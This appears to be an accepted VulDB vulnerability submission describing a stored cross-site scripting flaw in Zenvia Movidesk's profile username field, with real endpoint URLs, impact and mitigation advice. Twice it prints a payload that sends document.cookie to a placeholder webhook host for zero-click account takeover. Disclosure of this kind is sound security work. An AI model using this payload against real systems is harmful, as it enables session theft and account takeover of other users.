| Título | zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting |
|---|
| Descrição | Vulnerability Summary
A stored XSS vulnerability was identified in Zenvia's Moviedesk system. The flaw occurs in the username field, allowing the injection of malicious code.
When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack.
Vulnerability Details
Vulnerable endpoint (profile editing):https://service.sigmatelecom.com.br/Account/EditProfile
Endpoint where the XSS is triggered (ticket view):https://service.sigmatelecom.com.br/Ticket
Payload used:
<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
Impact
Automatic execution of malicious code upon viewing tickets;
Theft of session cookies, enabling Account Takeover without user interaction (0-click);
Compromise of accounts with access to ticket data;
Privilege escalation if the attacker gains access to administrator credentials.
Recommendations to mitigate this vulnerability, it is recommended to:
Input sanitization: Implement strict filtering and validation of user inputs in the "Username" field.
Output escaping: Ensure that all displayed data is properly escaped to prevent code execution.
HTTPOnly cookies: Configure session cookies with the HttpOnly flag to prevent JavaScript access.
Content Security Policy (CSP): Implement a restrictive CSP to mitigate unauthorized code execution.
Security audits: Conduct regular security testing to identify similar vulnerabilities.
Proof of Concept (PoC)
Access the profile editing endpoint:https://service.sigmatelecom.com.br/Account/EditProfile
Change the username to the following payload:
<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
Save the changes.
Access the ticket page:https://service.sigmatelecom.com.br/Ticket
Observe that the payload is executed and cookies are sent to the webhook. |
|---|
| Fonte | ⚠️ https://service.sigmatelecom.com.br/Ticket |
|---|
| Utilizador | y4g0 (UID 80480) |
|---|
| Submissão | 21/01/2025 01h15 (há 1 Ano) |
|---|
| Moderação | 02/02/2025 08h54 (12 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 294362 [Zenvia Movidesk até 25.01.22 Profile Editing /Account/EditProfile Nome de utilizador Script de Site Cruzado] |
|---|
| Pontos | 17 |
|---|